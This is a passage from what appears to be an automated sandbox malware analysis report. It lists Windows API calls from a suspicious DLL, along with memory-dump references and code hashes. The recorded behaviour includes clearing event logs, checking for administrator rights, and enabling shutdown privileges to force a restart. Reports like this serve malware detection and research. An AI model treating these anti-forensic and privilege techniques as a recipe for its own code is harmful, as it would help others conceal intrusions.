                                                  • Instruction Fuzzy Hash: 8E51F737B485849BC714DF98A452BEEFB65FB85621F0082AFE95987741CB366410C7D0
                                                  APIs
                                                    • Part of subcall function 100089F0: lstrlenA.KERNEL32(?), ref: 10008A21
                                                    • Part of subcall function 100089F0: malloc.MSVCRT ref: 10008A29
                                                    • Part of subcall function 100089F0: lstrcpyA.KERNEL32(00000000,?), ref: 10008A41
                                                    • Part of subcall function 100089F0: CharNextA.USER32(00000002), ref: 10008A6D
                                                    • Part of subcall function 100089F0: CharNextA.USER32(00000002), ref: 10008A8B
                                                    • Part of subcall function 100089F0: GetFileAttributesA.KERNEL32(00000000), ref: 10008ACF
                                                    • Part of subcall function 100089F0: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 10008ADC
                                                    • Part of subcall function 100089F0: GetLastError.KERNEL32 ref: 10008AE6
                                                    • Part of subcall function 100089F0: free.MSVCRT ref: 10008B44
                                                  • FindFirstFileA.KERNEL32(?,?,00000041,00000000,00000000,00000001,?,?,00000000,00000065), ref: 10009BDA
                                                  • FindClose.KERNEL32(00000000,0000006D,?,00000000,00000065), ref: 10009C06
                                                  • FindClose.KERNEL32(00000000,?,00000000,00000065), ref: 10009C21
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CharCloseFileNext$AttributesCreateDirectoryErrorFirstLastfreelstrcpylstrlenmalloc
                                                  • String ID:
                                                  • API String ID: 887710168-0
                                                  • Opcode ID: 6703766433a7eb1751993fb2cde4a4e3e360f15e5c6b0555f0ff15d622da5f13
                                                  • Instruction ID: 7edccb4fe516f4dcd3f53cbb636c582056df7d6c9d487251626477ac035d64a7
                                                  • Opcode Fuzzy Hash: 6703766433a7eb1751993fb2cde4a4e3e360f15e5c6b0555f0ff15d622da5f13
                                                  • Instruction Fuzzy Hash: FC11F3367001104BE714DB24DC91BFAB3D5EB89360F04063AFE1ACB2D6CA776D45C2A4
                                                  APIs
                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 10020A10
                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 10020A25
                                                  • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10020A30
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                  • String ID:
                                                  • API String ID: 3429775523-0
                                                  • Opcode ID: 9cd60866ab50a98c35c1f79ff38d4de2054aee1ceee2e1c8484874dd467a29a6
                                                  • Instruction ID: f6f7157a8b3012e72d1b12e548f4c87b378eb29056a0154ccc3d0e26a5706136
                                                  • Opcode Fuzzy Hash: 9cd60866ab50a98c35c1f79ff38d4de2054aee1ceee2e1c8484874dd467a29a6
                                                  • Instruction Fuzzy Hash: 9AF01D7515C380BFE340DB2889C4AABBBE8EBA4640FC45D4EF58943252D234D808CB27
                                                  APIs
                                                  • OpenEventLogA.ADVAPI32(00000000), ref: 1000E57C
                                                  • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 1000E587
                                                  • CloseEventLog.ADVAPI32(00000000), ref: 1000E58A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$ClearCloseOpen
                                                  • String ID:
                                                  • API String ID: 1391105993-0
                                                  • Opcode ID: b719f0b8eb9c5516b5e29b39de37e38f590415d9596412b4ce2da0eade4c8ec0
                                                  • Instruction ID: e2617011e296939ca9cc499396a789e41a2db0335649869ff5bc3c2fc59dee1f
                                                  • Opcode Fuzzy Hash: b719f0b8eb9c5516b5e29b39de37e38f590415d9596412b4ce2da0eade4c8ec0
                                                  • Instruction Fuzzy Hash: B8F0C271504755DBD300DF09CC80B4BBBE8FB88340F800D09F954A7201E775AE088BA6
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 10010656
                                                    • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                    • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                    • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                    • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueWindows
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3672536310-3733053543
                                                  • Opcode ID: 5c3b0d6465ec82876b96f4a11b20ef9413b9959b1a27daeafe2d367ede1fa4d8
                                                  • Instruction ID: 8bb9d6b82e749448676f30d8a34e8541df49bcb33f5f773f867f71790e701dd0
                                                  • Opcode Fuzzy Hash: 5c3b0d6465ec82876b96f4a11b20ef9413b9959b1a27daeafe2d367ede1fa4d8
                                                  • Instruction Fuzzy Hash: E9C01279540B0C2BD450DB509C87F4A32549B24705F544810F7145D1C1EAB9B454497E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2$?
                                                  • API String ID: 0-2669683831
                                                  • Opcode ID: 18b51c0b0597428ade0cc42061073558c06941a66ad1eaaed2ef619ccc6aa044
                                                  • Instruction ID: e59d18c9399794bc595010d9535c4f5fd19f6329648e616369369b2a66f2bfe8
                                                  • Opcode Fuzzy Hash: 18b51c0b0597428ade0cc42061073558c06941a66ad1eaaed2ef619ccc6aa044
                                                  • Instruction Fuzzy Hash: F072E7B4604B429FD368CF29C890B9AF7E5FB88304F118A2DE59D87351EB30A955CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: U,E
                                                  • API String ID: 0-4027942359
                                                  • Opcode ID: bb403865d610320d9d3144d3c8a59b381feae8db40863a7a375d4a88aa33cec3
                                                  • Instruction ID: 62788b8b9c83910406f6e107d4ec69dc7ae710b733b3debf393c051762315612
                                                  • Opcode Fuzzy Hash: bb403865d610320d9d3144d3c8a59b381feae8db40863a7a375d4a88aa33cec3
                                                  • Instruction Fuzzy Hash: 799279B5A002499FDB24CF28C881BEA77E5FF88344F50852EEA49CB351D734EA45CB95
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintf
                                                  • String ID:
                                                  • API String ID: 590974362-0
                                                  • Opcode ID: a311e224d3b611280b0c5575599f5b0587c0543bc42704fd8d91d4ca23e8156e
                                                  • Instruction ID: 808c53847acfdf9216db6dc04b8b7b88a66b939790637f942e3da9d10eba0512
                                                  • Opcode Fuzzy Hash: a311e224d3b611280b0c5575599f5b0587c0543bc42704fd8d91d4ca23e8156e
                                                  • Instruction Fuzzy Hash: 7C72F779A00B045FD320DE16DC81BAB73D5EFC5310F11C42DEAAA87B92EAB4F9418795
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `
                                                  • API String ID: 0-2679148245
                                                  • Opcode ID: 10aaac4bc456ae447689e31510077a261fc754ed3121a56b4c63e37c5f0abe01
                                                  • Instruction ID: 18d965c862d77f6eb6f028c9bfcb90855a64683182823b318e471b92e1be12ca
                                                  • Opcode Fuzzy Hash: 10aaac4bc456ae447689e31510077a261fc754ed3121a56b4c63e37c5f0abe01
                                                  • Instruction Fuzzy Hash: E17234B56087009FD358CF28CC85A6BB7E5FBC8304F14892DF99A87351EA75E901DB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-2852464175
                                                  • Opcode ID: 05437cc4da248d0b5c8cb68c61ac51f3f1356b75297161c92043c969fa7b9174
                                                  • Instruction ID: 187d62c811851c58088b2f1c6dce946c8a0fd3b94e8cc69681fc47f369cecc54
                                                  • Opcode Fuzzy Hash: 05437cc4da248d0b5c8cb68c61ac51f3f1356b75297161c92043c969fa7b9174
                                                  • Instruction Fuzzy Hash: 5F824AB5A042459FC758CF18C880AAAFBE5FF88344F14866EE949CB356D770E981CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p
                                                  • API String ID: 0-2181537457
                                                  • Opcode ID: edfbd1ea84352b2c03924f160aafdacb94c23fe558e0d61039c3047b50802fd7
                                                  • Instruction ID: be2f9a982d855fe0acc3e5900786f91d8e30c73ad0c7ec301cb64439d7d24710
                                                  • Opcode Fuzzy Hash: edfbd1ea84352b2c03924f160aafdacb94c23fe558e0d61039c3047b50802fd7
                                                  • Instruction Fuzzy Hash: AB7224756087019FD358CF28CC85A6BB7E5EBC8304F04892EFA9A87351EB35E905DB52
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: P
                                                  • API String ID: 0-3110715001
                                                  • Opcode ID: a1a55364413d3ef89c2f7a60bf0c9569dd49b5adc02bead3b12bba559e93fdfa
                                                  • Instruction ID: b9bb07d46858790f49a63e1c91e25e2bc60055ad9045bf75cb1d2f16ce9dff58
                                                  • Opcode Fuzzy Hash: a1a55364413d3ef89c2f7a60bf0c9569dd49b5adc02bead3b12bba559e93fdfa
                                                  • Instruction Fuzzy Hash: CD5238B56047019FD358CF29C885AABB7EAFBC8340F15892EE98AC7351DB74E805CB51
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _ftol
                                                  • String ID:
                                                  • API String ID: 2545261903-0
                                                  • Opcode ID: 788bfa54aaf249d77fea8fdb862df13636a9a2b59701512f82713b6c71fa2e98
                                                  • Instruction ID: 39c327ed84f0e5412e31c3cf6f5d7e14ba9cb04d76968d844ea3bcd7e96feca9
                                                  • Opcode Fuzzy Hash: 788bfa54aaf249d77fea8fdb862df13636a9a2b59701512f82713b6c71fa2e98
                                                  • Instruction Fuzzy Hash: DC221974A043868FD768CF18C890B9AB7E2FFC8304F11896EE9898B355D730E951CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p
                                                  • API String ID: 0-2181537457
                                                  • Opcode ID: b319f4ba5f98a03de8ddaaeec4595da07a77e3f803edd114fd8979aa377174a4
                                                  • Instruction ID: 84394aafb68977b9913fdc0b420e092136887bd94d60ee04b8eee693fad0dcd3
                                                  • Opcode Fuzzy Hash: b319f4ba5f98a03de8ddaaeec4595da07a77e3f803edd114fd8979aa377174a4
                                                  • Instruction Fuzzy Hash: AA2214726047009FD358CF68C885AABB7E9FB88304F05891DF99EC7351DB74A905DB62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-2852464175
                                                  • Opcode ID: b7c368c19ef43085cbd88bfad823d9457c7e6e5029ebf07f9028f357f5e6a29f
                                                  • Instruction ID: 1973868626951cbc4e1e6dbbbaae98c5aea718cf2aa9e198ecfd8e57a8fac991
                                                  • Opcode Fuzzy Hash: b7c368c19ef43085cbd88bfad823d9457c7e6e5029ebf07f9028f357f5e6a29f
                                                  • Instruction Fuzzy Hash: 4722F1B5A142059FCB48CF18C490A9ABBE5FF88310F558A6EFC49CB346D770E941CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
